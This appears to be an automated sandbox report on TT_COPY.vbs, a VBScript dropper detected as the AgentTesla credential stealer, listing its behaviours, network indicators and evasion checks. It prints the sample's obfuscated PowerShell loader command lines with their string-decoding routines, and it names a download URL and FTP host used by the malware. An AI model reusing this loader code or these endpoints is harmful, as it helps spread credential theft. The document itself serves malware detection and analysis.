Windows Analysis Report
TT_COPY.vbs

Overview

General Information

Sample Name: TT_COPY.vbs
Analysis ID: 758166
MD5: a27bc40b7cf1e7e7e7a9b38221d4e849
SHA1: d24c19f3cf76f8f47fa6fffb12422f0fa0252b3b
SHA256: 28a30c25fb101ed42b050c4b82777929b1cdd9fe02f8f386bb9708d3adb3b9bf

Detection

AgentTesla
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • wscript.exe (PID: 9204 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 2556 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """[obfuscated payload string omitted]""";;Function Cartwrighting9 { param([String]$Regionsplanlovs); For($Klistringer=2; $Klistringer -lt $Regionsplanlovs.Length-1; $Klistringer+=(2+1)){ $Smertensbarns = $Smertensbarns + $Regionsplanlovs.Substring($Klistringer, 1); } $Smertensbarns;}$talose0 = Cartwrighting9 'CeIFoEReXPr ';$talose1= Cartwrighting9 $Vildmnd;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $talose1 ;}else{.$talose0 $talose1;} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8364 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}[hex-encoded strings and their invocations omitted]$Cartwrighting=(Get-ItemProperty -Path 'HKCU:\Pseudambulacrum\konstitutionel').Bjfs;[hex-encoded strings and their invocations omitted]# MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • CasPol.exe (PID: 392 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: CasPol.exe PID: 392 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: CasPol.exe PID: 392 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
No Sigma rule has matched
No Snort rule has matched

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: Joe Sandbox View | IP Address: 185.31.121.136
Source: global traffic | HTTP traffic detected: GET /wp-admin/ZCaVuIfIpDLfuryX16 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: b3solutionscws.com Cache-Control: no-cache
Source: unknown | FTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49825 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 2 of 50 allowed. 220-Local time is now 16:50. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ftp://ftp.mcmprint.netnoffice
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://OowQOv.com
Source: CasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16
Source: CasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16po
Source: powershell.exe, 00000002.00000003.2155125374.0000026AAE6D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2457016446.0000026AAE735000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.2456250636.0000026AAE70A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.2155125374.0000026AAE6D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wNUxderhdqerb.org
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | DNS traffic detected: queries for: b3solutionscws.com

          System Summary

          barindex
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br 
No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
          Source: Initial file: Impi11.ShellExecute Skyler, " " & chrw(34) + Ce8 + chrw(34), "", "", 0
          Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 21279
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6954
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CC4280 7_2_00CC4280
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CC1960 7_2_00CC1960
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CD5C38 7_2_00CD5C38
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CD79E0 7_2_00CD79E0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CD5128 7_2_00CD5128
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDB930 7_2_00CDB930
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDDEC8 7_2_00CDDEC8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDDA77 7_2_00CDDA77
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDC323 7_2_00CDC323
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CD4500 7_2_00CD4500
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00DAC180 7_2_00DAC180
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1F824FA0 7_2_1F824FA0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1F82D720 7_2_1F82D720
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1F827AE0 7_2_1F827AE0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45AFDA NtQuerySystemInformation, 7_2_1D45AFDA
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45AFB8 NtQuerySystemInformation, 7_2_1D45AFB8
          Source: TT_COPY.vbs Initial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll
          Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 
'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45AAB6 AdjustTokenPrivileges, 7_2_1D45AAB6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45AA7F AdjustTokenPrivileges, 7_2_1D45AA7F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai3mehq5.lyv.ps1
          Source: classification engine Classification label: mal96.troj.spyw.evad.winVBS@7/4@2/2
          Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:304:WilStaging_02
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

          Data Obfuscation

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF825BB00BD pushad ; iretd 2_2_00007FF825BB00C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF825BB0428 push E95D2E73h; ret 2_2_00007FF825BB0459
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CC6629 push ss; retf 0000h 7_2_00CC662A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CC6638 push ss; retf 0000h 7_2_00CC667A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00DAC431 push 00000039h; ret 7_2_00DAC434
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D452551 pushfd ; ret 7_2_1D45255A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D453450 push edx; ret 7_2_1D453462
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45255D push esp; ret 7_2_1D452566
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D453168 push 8140738Fh; ret 7_2_1D45320A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45343D push esi; ret 7_2_1D45343E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D4533C2 push edi; ret 7_2_1D4533D2
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D4524DC push esp; ret 7_2_1D452566
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D4526F8 push esp; ret 7_2_1D45276A
          Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe
          Source: Initial file Initial file: do while timer-temp<sec
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240 Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2076 Thread sleep count: 730 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2076 Thread sleep time: -365000s >= -30000s
